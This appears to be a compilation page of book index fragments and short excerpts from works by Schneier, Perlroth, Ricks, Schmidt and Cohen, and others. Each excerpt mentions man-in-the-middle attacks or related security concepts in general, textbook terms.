227 energy companies vulnerabilities, 18 identity theft, 22–28 Jerusalem, 248 Klez, 248 Melissa, 248 Michelangelo, 248 Morris, 248 MyDoom, 248 Nimda, 248 Pakistani Flu, 248 Slammer, 248 Snort signatures, 228 Sober, 248 Sobig, 248 SQL Slammer worm, 225–227, 229 Symantec reports on, 229 VBS/Loveletter—“I Love you”, 248 W32.Gaobot worm, 229 malvertisements, 92–94 malware anti-virus software and, 251 as cyber attack method, 69 banking trojans, 141, 249 client-side exploitation, 15, 132, 
141–143 common distribution methods, 69 current market values, 67 directionality of attacks, 227 gaming trojans, 141, 249 historical review, 248–249 polymorphic, 70 production cycle, 64 streamlining identification of, 254 targeted advertising, 250 testing, 65 zero-day exploits, 252 malware producers defined, 64 information dealers and, 64 polymorphic malware, 70 testing code, 65 man-in-the-middle attacks, 25 manual penetration testing, 190 Massey, James, 117 MasterCard 3-D Secure protocol, 76 SET protocol, 78 Maurer, Ueli, 128 MBNA, 79 McAfee online safety survey, 187 SiteAdvisor, 97 vulnerability management, 152 McBurnett, Neal, 128 McCabe, Jim, 178, 179 McCaul, Mike, 201 McDougle, John, 178 McGraw, Gary, 186 McManus, John, 171–182 Mean Time Between Security Incidents (MTBSI), 48 Mean Time to Repair (MTTR), 58 Mean Time to Repair Security Incidents (MTTRSI), 48 Media Guard product, 94 medical field infosecurity and, 208 security metrics, 34–38 Melissa virus, 248 Merchant Server Plug-in (MPI), 77 meta-introducers, 123 metrician, 34 metrics Barings Bank security breach, 38–49 coverage, 46 for data responsibility, 72 health care field, 34–38 investment, 47 measuring ROI, 163 scan coverage, 58 software development lifecycle and, 172–174, 189 TJX security breach, 49–59 treatment effect, 48 MetricsCenter technology, 45 MetricsCenter.org, 54 Michelangelo virus, 248 microchunking, 166 Microsoft, 134 (see also Internet Explorer) Authenticode, 110 Azure cloud operating system, 152 Commission on Cyber Security, 201 CPC advertising, 100 hierarchical trust, 110 honeymonkeys, 144 L0phtCrack example, 3–6 security controls in SDLC, 194 SQL Server, 225 supporting legacy systems, 7 testing approach, 10 Unix systems and, 8 MITRE Corporation, 135, 222 money, 44, 70, 141 (see also financial institutions; PCI) Monroe Doctrine, 201 Morris virus, 248 mothership systems, 230 Motorola Corporation, 31 Mozilla Firefox honeyclient support, 140, 145 malware exploits and, 141 MPI 
(Merchant Server Plug-in), 77 MTBSI (Mean Time Between Security Incidents), 48 MTTR (Mean Time to Repair), 58 MTTRSI (Mean Time to Repair Security Incidents), 48 Murray, Daragh, 144 MyDoom virus, 248 MySpace social network, 159 N naïveté client counterpart of, 8–9 learned helplessness and, 2–7 NASA background, 171 perception of closed systems, 172 software development lifecycle, 172–174, 178–181 National Institute for Standards, 159 National Office for Cyberspace (NOC), 201, 202 Nazario, Jose, 145 newsgroups, 250 Nichols, Elizabeth, 33–61 Nichols, Elizabeth A., 30 Nimda virus, 248 NOC (National Office for Cyberspace), 201, 202 NTLM authentication, 6 O OCC, 191 off-the-shelf software (see software acquisition) Office Max, 50 online advertising advertisers as victims, 98–105 attacks on users, 89–98 CPA advertising, 102–103 CPC advertising, 100–101 CPM advertising, 100–103 creating accountability, 105 deceptive ads, 94–98 exploit-laden banner ads, 89–92 false impressions, 98–99 fighting fraud, 103–104 malvertisements, 92–94 special procurement challenges, 104 targeted, 250 online advertising, targeted, 249 online forums, 250 Open Security Foundation, 55 open source honeyclients, 133–135 Open Web Application Security Project (see OWASP) OpenID identity management, 154 OpenPGP standard/protocol background, 108 certification support, 111, 112 designated revokers, 122 direct trust, 109 exportable signatures, 125 extended introducers, 123 in-certificate preferences, 126 key support, 112 key-editing policies, 126 revoking certificates, 122 OpenSocial API, 159 operating systems, host logging, 232, 236 OptOut spyware removal tool, 251 Orange Book, 213 organizational culture, 200–202 outsourcing extending security initiative to, 190 trends in, 154 vulnerability research, 156 OWASP (Open Web Application Security Project) background, 159 CLASP methodology, 187 Top 10 list, 187 P P2P (peer-to-peer) networks botnet communication, 66 honeyclient considerations, 146 packet 
sniffers, 92 packets handshake, 28 SQL Slammer worm, 227 Pakistani Flu virus, 248 PAN (Primary Account Number), 77 Panda Labs, 69 PAR (Payer Authentication Request), 77 PARAM tag, 94 passive sniffing, 9 passphrases, 29 password grinding, 28 password-cracking tools L0phtCrack example, 3–6 passphrases and, 29 passwords authentication security, 7 identity theft and, 24 NTLM authentication and, 6 PATHSERVER, 129 Payer Authentication Request (PAR), 77 Payment Card Industry (see PCI) PayPal, 79 PCI (Payment Card Industry) Data Security Standard, 75, 82, 159, 211, 214, 237 protecting credit card data, 44 peer-to-peer networks (see P2P networks) PEM (Privacy Enhanced Mail), 117 perma-vendors, 156 Personally Identifiable Information (PII), 180 Pezzonavante honeyclient, 144 PGP (Pretty Good Privacy), 111 (see also Web of Trust) background, 107, 108, 116 backward compatibility issues, 117 Crypto Wars, 118 designated revokers, 122 encryption support, 107, 116–120 key validity, 108 patent and export problems, 117 source download, 116 trust models, 109–116 trust relationships, 108 PGP Corporation, 108 PGP Global Directory, 127 pharmware, 68 phishing 3-D Secure protocol, 77 as information source, 68 botnet support, 66 challenges detecting, 231 spam and, 70 specialization in, 249 PhoneyC website, 145 PII (Personally Identifiable Information), 180 Piper, Fred, 168 PKI (Public Key Infrastructure) authoritative keys, 123 defined, 111 DSG support, 203 revoking certificates, 120 SET considerations, 79 PlexLogic, 45 Plumb, Colin, 119 port scanning, 231 pragmatic security, 200, 209 Pre-Shared Key (PSK), 28 Pretty Good Privacy (see PGP) Price, Will, 127 Primary Account Number (PAN), 77 Privacy Enhanced Mail (PEM), 117 proof-of-concept project, 191–193 Provos, Niels, 145 PSK (Pre-Shared Key), 28 psychological traps confirmation traps, 10–14 functional fixation, 14–20 learned helplessness, 2 public key cryptography cumulative trust systems, 111 key revocation, 121 PGP 
support, 107 RSA algorithm, 117 SET support, 78 steganographic applications, 245 validity, 108 Public Key Infrastructure (see PKI) Public Key Partners, 118 put options, 39 Q Qualys vulnerability management, 151 R Raduege, Harry, 201 Regular, Bob, 90 regulatory compliance (see legal considerations) Reiter, Mark, 129 Reliable Software Technologies, 171, 173 reputation economy, 167 resource dealers, 64 Return on Investment (ROI), 163, 205–207 Return on Security Investment (ROSI), 206 Returnil, 254, 255, 256, 257 revoking certificates, 120–122 RFC 1991, 108, 119 RFC 3156, 108 RFC 4880, 108 Right Media, 94 ROI (Return on Investment), 163, 205–207 root certificates defined, 109 direct trust, 110 rootkits example investigating, 220 Rustock.C, 252 specialization in, 249 ROSI (Return on Security Investment), 206 routers DDoS attacks on, 16 host logging, 232 watch lists, 231 Routh, Jim, 183–197 RSA Data Security Incorporated, 117 RSA public-key algorithm, 117 RSAREF library, 117 Rustock.C rootkit, 252 S Sabett, Randy V., 199–212 sandboxing functionality, 254 HIPS support, 253 need for new strategies, 248 Santa Fe Group, 44 Sarbanes-Oxley Act (SOX), 80, 214 SCADA systems, 18 Schoen, Seth, 127 SDLC (see software development lifecycle) Second Life virtual world, 159 Secret Service Shadowcrew network and, 65 TJX security breach and, 50 Secunia, 156 Secure Electronic Transaction (see SET) security breaches attorney involvement in investigating, 211 Barings Bank, 38–49 California data privacy law, 203–205 cyber underground and, 63–72 databases and, 239 impact of, 208 logs in investigating, 218–221 public data sources, 59 tiger team responses, 210–211 TJX, 49–59 security certificates defined, 22 encryption and, 22, 24 fundamental flaw, 25 paying attention to, 26 wireless access points, 26, 27 Security Event Managers (SEMs), 153 security metrics (see metrics) Security Metrics Catalog project, 54 security traps (see psychological traps) SecurityFocus database, 132 
SecurityMetrics.org, 54 SEI (Software Engineering Institute), 176 Seifert, Christian, 138, 145 self-signed certificates, 109 SEMs (Security Event Managers), 153 separation of duties, 39 September 11, 2001, 249 server applications, host logging, 232 Service Set Identifier (SSID), 52 service-oriented architecture (SOA), 150 SET (Secure Electronic Transaction) background, 78 evaluation of, 79 protections supported, 78 transaction process, 79 SHA256 hash algorithm, 241 Shadowcrew network, 65 short straddle trading strategy, 39, 40 signature harassment, 125 Sinclair, Upton, 149 Skinner, B.
The New Digital Age: Transforming Nations, Businesses, and Our Lives by Eric Schmidt, Jared Cohen
access to a mobile phone, additive manufacturing, airport security, Amazon Mechanical Turk, Amazon Web Services, Andy Carvin, Andy Rubin, anti-communist, augmented reality, Ayatollah Khomeini, barriers to entry, bitcoin, borderless world, call centre, Chelsea Manning, citizen journalism, clean water, cloud computing, crowdsourcing, data acquisition, Dean Kamen, disinformation, driverless car, drone strike, Elon Musk, Evgeny Morozov, failed state, false flag, fear of failure, Filter Bubble, Google Earth, Google Glasses, Hacker Conference 1984, hive mind, income inequality, information security, information trail, invention of the printing press, job automation, John Markoff, Julian Assange, Khan Academy, Kickstarter, knowledge economy, Law of Accelerating Returns, market fundamentalism, Mary Meeker, means of production, military-industrial complex, MITM: man-in-the-middle, mobile money, mutually assured destruction, Naomi Klein, Nelson Mandela, no-fly zone, off-the-grid, offshore financial centre, Parag Khanna, peer-to-peer, peer-to-peer lending, personalized medicine, Peter Singer: altruism, power law, Ray Kurzweil, RFID, Robert Bork, self-driving car, sentiment analysis, Silicon Valley, Skype, Snapchat, social graph, speech recognition, Steve Jobs, Steven Pinker, Stewart Brand, Stuxnet, Susan Wojcicki, The Wisdom of Crowds, upwardly mobile, Whole Earth Catalog, WikiLeaks, young professional, zero day
Users assume they are safe, but unless the exchange is encrypted, anyone with access to intermediate parts of the network can listen in. For instance, the owner of a Wi-Fi hot spot can listen to any unencrypted conversations of users connected to the hot spot. One of the most insidious forms of cyber attack that P2P users can encounter is known as a “man-in-the-middle” attack, a form of active eavesdropping. In this situation a third-party attacker inserts himself between two participants in a conversation and automatically relays messages between them, without either participant realizing it.
…
This third party acts like an invisible intermediary, having tricked each participant into believing that the attacker is actually the other party of the conversation. So as the conversation occurs (whether through text, voice or video), that third-party attacker can sit back and watch, occasionally siphoning off information and storing it elsewhere. (Or, more maliciously, the attacker could insert false information into the conversation.) Man-in-the-middle attacks occur in all protocols, not just peer-to-peer, yet they seem all the more malicious in P2P communications simply because people using those platforms believe they are secure. And even the protection that encryption offers isn’t a sure bet, especially given some of the checks that will still exist in the physical realm.
…
Libya, 4.1, 4.2, 4.3, 6.1, 7.1, 7.2 life expectancy Lindhout, Amanda LinkedIn Link Egypt litigation lobbying groups Lockhart, Clare, n Lockheed Martin Lord’s Resistance Army loyalties, 2.1, 2.2 LulzSec Maasai, 1.1, nts.1 McAfee, John McChrystal, Stanley Malaysia, 3.1, 4.1, 6.1n Mali, 2.1, 7.1 malware state-initiated, 2.1, 2.2 Mandela, Nelson “man-in-the-middle” attacks Manning, Bradley Mao Zedong MasterCard, 5.1, 5.2 Mauritania, 3.1, 3.2 Mbeki, Thabo MCI Mechanical Turk media: disaggregated mainstream media cycles medicine Megaupload Mehr, 95 memory prosthetics Mexico, 2.1, 5.1, 6.1 microblogs microphones Microsoft, 1.1, 3.1, 3.2 Middle East military-industrial complex Milošević, Slobodan mine-resistant, ambush-protected (MRAP) vehicles Ministry of Posts and Telecommunications, North Korea minority groups, 6.1, con.1 Minority Report (film), 1.1 misinformation, 3.1, 3.2, 6.1 MIT Media Lab Mitnick, Kevin, n Mobile Giving Foundation “mobile health” revolution mobile money credits mobile phones, 1.1, 4.1, 5.1, 5.2, 5.3, 7.1, 7.2, con.1 banned in Iraq in Congo education and health and see also smart phones Money for Good report, nts.1 Mongolia Monopoly (film), 4.1 monuments Moore’s Law, itr.1, con.1 moral sense Moro Islamic Liberation Front Morsi, Mohamed Motorola MTC-Vodafone Mubarak, Hosni, 3.1, 3.2, 4.1, 4.2, 4.3, 7.1 Mugabe, Robert multilayer backup systems Mumbai attacks Mundie, Craig, 3.1, 3.2, 3.3 Muslim Brotherhood, 4.1, 4.2, 4.3 Mutua, Anthony myths names, 2.1, nts.1 Napster narco-terrorists, 5.1, 5.2 nasal implants Natanz nuclear enrichment facility National Security Agency (NSA) National Security Law National Transitional Council (NTC) NATO, 3.1, 4.1, 5.1, 6.1, 6.2, 6.3 Navalny, Alexei Navy SEAL Team Six, 5.1, 5.2 Nawaz, Maajid near-permanent data storage Neda video, 6.1, 6.2 Netflix Netherlands net neutrality Nevada New York City subway, n New York Times, 33, 3.1, 3.2, 4.1, 5.1, 7.1 New York Times Magazine, 197 NGO Ratings Nigeria Nightmare Nixon, Richard 
noise Nokia Siemens Networks (NSN) nongovernmental organizations (NGOs), 1.1, 2.1, 2.2, 3.1, 6.1, 7.1, 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, con.1, nts.1 nonprofits non-state actors, coping strategies for privacy and security concerns Noor Group, n North Korea, 2.1, 3.1, 3.2, 3.3 Northrop Grumman Norway Nuclear Nonproliferation Treaty Obama, Barack, 3.1, 3.2, 6.1 unauthorized leaks and official profiles Ohio State University Olympic Games (attack code name) One World Trust online cadastral systems online reputations active management of black markets in insurance for open networks open-source movement open-source software, 6.1, 7.1 Operation Avenge Assange optimism options Orascom, 3.1, 3.2 Otpor Ottoman empire, 6.1, 7.1 outsourcing oversights OxOmar PackBot Pakistan, 3.1, 3.2, 4.1, 5.1, 5.2, 5.3, 5.4, 6.1 Palestinian Islamic Jihad paparazzi Paraguay parents Parrot passwords, 2.1, 2.2 patents PayPal, 5.1, 5.2 peer-to-peer (P2P) networking, 2.1, 4.1, nts.1 Philanthropedia philanthropic organizations Philippines, 3.1, 4.1 photographs photonics photos physical infrastructure Picciolini, Christian Pinker, Steven piracy (online) Pirate Bay, 2.1, 3.1 pirates Plataforma México Poland, 4.1, 7.1 police police brutality police cars popular uprisings pornography postcrisis societies, 3.1, 7.1, 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, 7.8, 7.9, 7.10 poverty power, centralization of power grids Powers, Jonathan power vacuums precision geo-location Predator drones predictive analytics Presidential Records Act privacy, itr.1, 2.1, 2.2, 2.3 in autocracies company policy on, 2.1, 2.2 litigation and in schools security vs., itr.1, 5.1, 5.2 private telecommunications companies processors productivity, 1.1, 1.2 Project Glass property rights Proteus Digital Health proxy servers Psy, n PTSD Pul-e-Charkhi prison Putin, Vladimir Qatar quality of life, 1.1, 1.2 Queen Boat, n racism radio frequency identification (RFID) chips Raytheon real-time collective editing Reaper drones reconstruction connectivity and, 
7.1, 7.2 of telecommunications Red Cross, 7.1, 7.2 refugee camps REM cycle remote warfare Renesys, n renrou sousuo yinqing, 197 Reporters Without Borders Reputation.com Research in Motion (RIM), 2.1, 2.2 Resource 207 Responsibility to Protect (RtoP) doctrine restraining orders Revolutionary Armed Forces of Colombia (FARC) revolutions, itr.1, 4.1 connectivity and, 4.1, 4.2, 4.3, 4.4, 4.5, 4.6 finish of public awareness of start of robotic surgical suites, n robots, 1.1, 1.2, 6.1, 6.2, 6.3, 6.4, 6.5 Rodong Sinmun, 97 Roma, 6.1, nts.1 Romania Roomba, 1.1, 6.1 Rosenberg, Tina Roshan Ross, Alec routers RQ-170 Sentinel Rubin, Andy Russia, 3.1, 3.2, 3.3, 3.4, 3.5, 3.6 liberal opposition in revolution in state-owned media in Rwanda genocide in, 6.1, 7.1 safe zones sakoku, 93 Salafis, n Saleh, Ali Abdullah Salem, Mahmoud Samasource Sanger, David E.
The Generals: American Military Command From World War II to Today by Thomas E. Ricks
affirmative action, airport security, amateurs talk tactics, professionals talk logistics, Charles Lindbergh, Columbine, continuation of politics by other means, cuban missile crisis, hiring and firing, MITM: man-in-the-middle, no-fly zone, RAND corporation, Ronald Reagan, Seymour Hersh, South China Sea, Yom Kippur War
RICKS TITLE PAGE COPYRIGHT DEDICATION EPIGRAPH PROLOGUE: Captain William DePuy and the 90th Division in Normandy, summer 1944 PART I WORLD WAR II 1. General George C. Marshall: The leader 2. Dwight Eisenhower: How the Marshall system worked 3. George Patton: The specialist 4. Mark Clark: The man in the middle 5. “Terrible Terry” Allen: Conflict between Marshall and his protégés 6. Eisenhower manages Montgomery 7. Douglas MacArthur: The general as presidential aspirant 8. William Simpson: The Marshall system and the new model American general PART II THE KOREAN WAR 9. William Dean and Douglas MacArthur: Two generals self-destruct 10.
…
Narrow as that mission is, it was precisely the job the American military faced in Europe in late 1944 and early 1945, and that is likely the primary reason Patton was never sent home in disgrace. On balance, Eisenhower was right to keep him. And the modern American military probably is worse for not having a few senior commanders with a dose of Patton’s dynamism and color in them. CHAPTER 4 Mark Clark The man in the middle Like Patton, Lt. Gen. Mark Clark was close to Eisenhower, but he was far less effective on the battlefield. Clark was also a difficult man to like. “It makes my flesh creep to be with him,” Patton once wrote in his diary. Ten months later Patton noted that “anyone who serves under Clark is always in danger.”
…
Patton also told Eisenhower: Blumenson, Patton Papers, 55, 168. “He is the most modern general”: Blumenson, Patton Papers, 654. See also B. H. Liddell Hart, The German Generals Talk (Berkley, 1958), 215. “a master of fast” . . . “United States Army has known”: Eisenhower, At Ease, 172–73. 4. MARK CLARK: THE MAN IN THE MIDDLE “It makes my flesh creep” . . . “Clark is always in danger”: Blumenson, Patton Papers, 157, 361. the assault was a “near disaster”: General Mark W. Clark, Calculated Risk (Enigma, 2007), 152. “Mark, leave enough ammunition”: Frank James Price, Troy H. Middleton: A Biography (Louisiana State University Press, 1974), 169.
This Is How They Tell Me the World Ends: The Cyberweapons Arms Race by Nicole Perlroth
4chan, active measures, activist lawyer, air gap, Airbnb, Albert Einstein, Apollo 11, barriers to entry, Benchmark Capital, Bernie Sanders, Big Tech, bitcoin, Black Lives Matter, blood diamond, Boeing 737 MAX, Brexit referendum, Brian Krebs, Citizen Lab, cloud computing, commoditize, company town, coronavirus, COVID-19, crony capitalism, crowdsourcing, cryptocurrency, dark matter, David Vincenzetti, defense in depth, digital rights, disinformation, don't be evil, Donald Trump, driverless car, drone strike, dual-use technology, Edward Snowden, end-to-end encryption, failed state, fake news, false flag, Ferguson, Missouri, Firefox, gender pay gap, George Floyd, global pandemic, global supply chain, Hacker News, index card, information security, Internet of things, invisible hand, Jacob Appelbaum, Jeff Bezos, John Markoff, Ken Thompson, Kevin Roose, Laura Poitras, lockdown, Marc Andreessen, Mark Zuckerberg, mass immigration, Menlo Park, MITM: man-in-the-middle, moral hazard, Morris worm, move fast and break things, mutually assured destruction, natural language processing, NSO Group, off-the-grid, offshore financial centre, open borders, operational security, Parler "social media", pirate software, purchasing power parity, race to the bottom, RAND corporation, ransomware, Reflections on Trusting Trust, rolodex, Rubik’s Cube, Russian election interference, Sand Hill Road, Seymour Hersh, Sheryl Sandberg, side project, Silicon Valley, Skype, smart cities, smart grid, South China Sea, Steve Ballmer, Steve Bannon, Steve Jobs, Steven Levy, Stuxnet, supply-chain attack, TED Talk, the long tail, the scientific method, TikTok, Tim Cook: Apple, undersea cable, unit 8200, uranium enrichment, web application, WikiLeaks, zero day, Zimmermann PGP
The agency appeared to have acquired a vast library of invisible backdoors into almost every major app, social media platform, server, router, firewall, antivirus software, iPhone, Android phone, BlackBerry phone, laptop, desktop, and operating system. In the hacking world, these invisible backdoors have sci-fi names: they call them zero-days (or 0 days), pronounced “oh-days.” Zero-day is one of those cyber terms like infosec and man-in-the-middle attack that security professionals throw around to make it all too easy for the rest of us to tune them out. For the unindoctrinated: zero-days offer digital superpowers. They are a cloak of invisibility, and for spies and cybercriminals, the more invisible you can make yourself, the more power you will have.
…
In a single day, top-secret NSA slides showed that—unbeknownst to Yahoo, Microsoft, Facebook, and Google—the agency had collected “444,743 Yahoo email address books, 105,068 from Hotmail, 82,857 from Facebook, 33,697 from Gmail, and 22,881 from unspecified providers.” That wasn’t the worst of it. The slides appeared to show that the NSA and GCHQ were directly hacking Google and Yahoo’s internal data centers to intercept customer data before it was encrypted and passed over the open web—essentially a man-in-the-middle attack. The NSA-GCHQ code name for these attacks was Muscular. On one level, it was helpful in explaining that the companies were not willing accomplices. “It provided us a key to finally understand what was going on,” Brad Smith, Microsoft’s president, told Wired magazine. “We had been reading about the NSA reportedly having a massive amount of data.
…
In most cases, the Russians were hacking people—the industrial control engineers who maintain direct access to pipelines, transmission lines, and power switches. In others the Russians infected legitimate websites frequented by utility, pipeline, and grid operators with malware in what security specialists call a “watering-hole attack,” because hackers poison the well and wait for prey to come. And in still others, Russian hackers were conducting man-in-the-middle attacks, redirecting victims’ web traffic through Russian hackers’ machines, taking American grid operators’ usernames, passwords, blueprints, and emails on the way through. This was hardly the first time a foreign actor had targeted the energy sector. China had hacked into one American energy firm after another with cyberattacks that American officials concluded were designed to steal U.S. fracking and renewable energy technology.
Mastering Blockchain: Unlocking the Power of Cryptocurrencies and Smart Contracts by Lorne Lantz, Daniel Cawrey
air gap, altcoin, Amazon Web Services, barriers to entry, bitcoin, blockchain, business logic, business process, call centre, capital controls, cloud computing, corporate governance, creative destruction, cross-border payments, cryptocurrency, currency peg, disinformation, disintermediation, distributed ledger, Dogecoin, Ethereum, ethereum blockchain, fault tolerance, fiat currency, Firefox, global reserve currency, information security, initial coin offering, Internet of things, Kubernetes, litecoin, low interest rates, Lyft, machine readable, margin call, MITM: man-in-the-middle, multilevel marketing, Network effects, offshore financial centre, OSI model, packet switching, peer-to-peer, Ponzi scheme, prediction markets, QR code, ransomware, regulatory arbitrage, rent-seeking, reserve currency, Robinhood: mobile stock trading app, Ross Ulbricht, Satoshi Nakamoto, Silicon Valley, Skype, smart contracts, software as a service, Steve Wozniak, tulip mania, uber lyft, unbanked and underbanked, underbanked, Vitalik Buterin, web application, WebSocket, WikiLeaks
When the user wants to log in, the following sequence takes place: The user sends the password as plain text to the server. The server encrypts the password using a standard encryption algorithm, such as MD5. If the newly generated MD5 hash matches the hash stored in the database, then the password entered is valid. However, this method makes the user’s password vulnerable to the following: Man-in-the-middle attacks: If a hacker compromises the communication between the user and the server, it is possible to intercept the plain-text password. Brute force and dictionary attacks: If a website’s database is breached, a hacker can potentially decrypt the user’s password through various methods, including brute force using trial and error or dictionary attacks using a list of words or phrases.
…
evolution of, Electronic Systems and Trust Internet of Things (IoT), permissioned ledger implementations of blockchain, Internet of Things interoperability between different blockchains, Interoperability Interplanetary File System (IPFS), Web 3.0 issuance trust, Electronic Systems and Trust IT systems, permissioned ledger uses, IT Ixcoin, Altcoins J Java, Corda language JPMorgan, JPMorganinterbank payments using permissioned ledger, Payments jurisdiction over cryptocurrency exchanges, Jurisdiction K Keccak-256 hash algorithm, Hashes Know Your Customer (KYC) rules, Banking Risk, DAIon centralized and decentralized exchanges, Know your customer crypto laundering and, The Evolution of Crypto Laundering implementation in Novi wallet, Novi in Singapore, Singapore stablecoins requiring/not requiring, KYC and pseudonymity L LBFT consensus protocol, How the Libra Protocol Works Ledger wallet, Wallets ledgers, Storing Data in a Chain of Blocks, Databases and LedgersCorda, Corda ledger distributed verifiable, key properties of, Key Properties of Distributed Verifiable Ledgers Hyperledger Fabric technology, Hyperledger permissioned ledger uses of blockchain, Permissioned Ledger Uses-Payments Ripple, Ripple legal industry, permissioned ledger uses, Legal legal requirements, cryptocurrency and blockchain technology skirting the laws, Skirting the Laws lending services (DeFi), Lending less than 5% rule, Counterparty Risk Libra, Libra-Summaryborrowing from existing blockchains, Borrowing from Existing Blockchains centralization challenges, Novi how the Libra protocol works, How the Libra Protocol Works-Transactionsblocks, Blocks transactions, Transactions Libra Association, The Libra Association Novi wallet and other third-party wallets, Novi Lightning, Lightning, Lightningfunding transactions, Funding transactions nodes and wallets, Lightning nodes and wallets off-chain transactions, Off-chain transactions solving scalability issues on Blockchain, Lightning Liquid multisignature 
wallet, Liquid liquidity, Arbitrageor depth in a market, Hunting for Bart Litecoin, Litecoin longest chain rule, The mining process lottery-based consensus, Alternative methods M MaidSafe, Understanding Omni LayerICO for, Use Cases: ICOs Maker project's DAI, DAIsavings rates for DAI, Savings Malta, regulatory arbitrage, Malta man in the middle attacks, Zero-Knowledge Proof margin/leveraged products, Derivatives market capitalization, low, cryptocurrencies with, Whales market depthconsiderations in cryptocurrency trading, Basic Mistakes lacking in cryptocurrency market, Cryptocurrency Market Structure market infrastructure, Market Infrastructure-Summaryanalysis, Analysis-Hunting for Bartfundamental cryptocurrency analysis, Fundamental Cryptocurrency Analysis-Tools for fundamental analysis technical cryptocurrency analysis, Technical Cryptocurrency Analysis-Hunting for Bart arbitrage trading, Arbitrage Trading-Float Configuration 3 cryptocurrency market structure, Cryptocurrency Market Structure-Transaction flowsarbitrage, Arbitrage counterparty risk, Counterparty Risk market data, Market Data-Transaction flows depth charts, Depth Charts derivatives, Derivatives exchange APIs and trading bots, Exchange APIs and Trading Bots-Market Aggregatorsmarket aggregators, Market Aggregators open source trading tech, Open Source Trading Tech rate limiting, Rate Limiting REST versus WebSocket APIs, REST Versus WebSocket testing trading bot in sandbox, Testing in a Sandbox exchanges, The Role of Exchanges-The Role of Exchanges order books, Order Books regulatory challenges, Regulatory Challenges-Basic Mistakes slippage in cryptocurrency trading, Slippage wash trading, Wash Trading ways to buy and sell cryptocurrency, Evolution of the Price of Bitcoin whales, Whales market size, Order Books Mastercoin, Mastercoin and Smart Contracts, Tokenize EverythingEthereum and, Ethereum: Taking Mastercoin to the Next Level raising cryptocurrency funds to launch a project, Use Cases: ICOs 
Meetup.com, Information mempool, unconfirmed transactions on Bitcoin, Transaction life cycle Merkelized Abstract Syntax Trees (MAST), Privacy Merkle roots, Storing Data in a Chain of Blocks, The Merkle Root-The Merkle Rootin block hashes, Block Hashes Merkle trees, The Merkle Root MetaMask wallet, ConsenSys, Walletsusing in writing smart contracts, Writing a smart contract Middleton, Reggie, Skirting the Laws Mimblewimble, Mimblewimble, Beam, and Grin mining, Mining-Block Generation, Evolution of the Price of BitcoinBitcoin, problems with, Ripple and Stellar block generation, Block Generation GAW Miners, Skirting the Laws impacts on market data, Slippage incentives for, Mining Is About Incentives miners discovering new block at same time, The mining process process on Bitcoin for block discovery, The mining process Scrypt, Altcoins transactions confirmed by miner on Bitcoin, Transaction life cycle mint-based currency model, The Whitepaper minting, Important Definitions MKR token, DAI mobile wallets, Wallet Type Variations Moesif’s binary encoder/decoder, Custody and counterparty risk Monero, Monero, Ring Signatures, The Evolution of Crypto Laundering, Blockchains to Watchhow it works, How Monero Works-How Monero Works money laundering, Banking Risk(see also Anti-Money Laundering (AML) rules) evolution of crypto laundering, The Evolution of Crypto Laundering-The Evolution of Crypto Laundering Money Services Business (MSB) standards, The FATF and the Travel Rule MoneyGram, Ripple Mt.
API Marketplace Engineering: Design, Build, and Run a Platform for External Developers by Rennay Dorasamy
Airbnb, Amazon Web Services, barriers to entry, business logic, business process, butterfly effect, continuous integration, DevOps, digital divide, disintermediation, fault tolerance, if you build it, they will come, information security, Infrastructure as a Service, Internet of things, Jeff Bezos, Kanban, Kubernetes, Lyft, market fragmentation, microservices, minimum viable product, MITM: man-in-the-middle, mobile money, optical character recognition, platform as a service, pull request, ride hailing / ride sharing, speech recognition, the payments system, transaction costs, two-pizza team, Uber and Lyft, uber lyft, underbanked, web application
The purpose of this step is to establish the client identity and allow the resource server to track access requests. 2. The Client provides details regarding where the request will originate from and where the end user should be redirected to. This is important as it limits potential man-in-the-middle attacks. As you will note, the redirect URI is used for a number of interactions. 3. At the end of this process, the Resource Server will provide credentials to the Client in the form of a Client ID and Client Secret. In some API Gateway products, once an application is created, access to API products is achieved through a subscription process.
…
That is, if the request is not processed successfully within milliseconds, it could result in potential revenue loss for the merchant consuming the interface. The approaches to achieve this requirement are contrasted in Figure 7-6. On the left is our current approach which we have dubbed the “man-in-the-middle” pattern and on the right is the new “tap-and-go” strategy. Proponents for the tap-and-go highlight that as the Marketplace is not an integral participant in the transaction, an observer role should be adopted. As an observer, only information necessary for monitoring and insight should be extracted.
Getting Started With OAuth 2.0 by Ryan Boyd
MITM: man-in-the-middle, Salesforce, social graph, web application
There are two main types of replay attacks we wish to prevent: An attacker capturing a user’s OAuth credentials as they log in to a site and using them later on the same site. A rogue application developer using the OAuth token a user was issued to log in to their malicious app in order to impersonate the user on a different legitimate app. The OAuth 2.0 specification requires the OAuth endpoint and APIs to be accessed over SSL/TLS to prevent man-in-the-middle attacks, such as the first case. Preventing rogue application developers from replaying legitimate OAuth credentials their app received in order to impersonate one of their users on another app requires a solution specific to OpenID Connect. This solution is the Check ID Endpoint. The Check ID Endpoint is used to verify that the credentials issued by the OAuth provider were issued to the correct application.
Secrets and Lies: Digital Security in a Networked World by Bruce Schneier
Ayatollah Khomeini, barriers to entry, Bletchley Park, business process, butterfly effect, cashless society, Columbine, defense in depth, double entry bookkeeping, drop ship, fault tolerance, game design, IFF: identification friend or foe, information security, John Gilmore, John von Neumann, knapsack problem, macro virus, Mary Meeker, MITM: man-in-the-middle, moral panic, Morris worm, Multics, multilevel marketing, mutually assured destruction, PalmPilot, pez dispenser, pirate software, profit motive, Richard Feynman, risk tolerance, Russell Brand, Silicon Valley, Simon Singh, slashdot, statistical model, Steve Ballmer, Steven Levy, systems thinking, the payments system, Timothy McVeigh, Y2K, Yogi Berra
The result is a file that can only be accessed by Alice, or someone else who knows the password. Want to build a secure telephone? Use public-key cryptography to generate a random session key, and then use symmetric cryptography and that session key to encrypt the conversation. A hash function provides added security against man-in-the-middle attacks. (More about those later.) To secure e-mail, use public-key cryptography for privacy and digital signature schemes for authentication. Electronic commerce? Usually nothing more than digital signatures and sometimes encryption for privacy. A secure audit log: combine a hash function, encryption, maybe a MAC, and stir.
…
Maybe you can manipulate the protocol between the bank and the card that adds money onto the card. If you can replay old messages, you can add more money onto the card. Or maybe you can delete a message in the protocol for transferring money out of the card when you buy something, so that the money never gets decremented from the card. One powerful attack is the man-in-the-middle attack. Alice wants to talk securely with Bob, using some public-key algorithm to establish a key. Eve, the eavesdropper, intercepts Alice’s communication. She pretends to be someone named Bob to Alice, completing the key-exchange protocol. Then she contacts Bob and pretends to be Alice, completing a second key-exchange protocol with Bob.
…
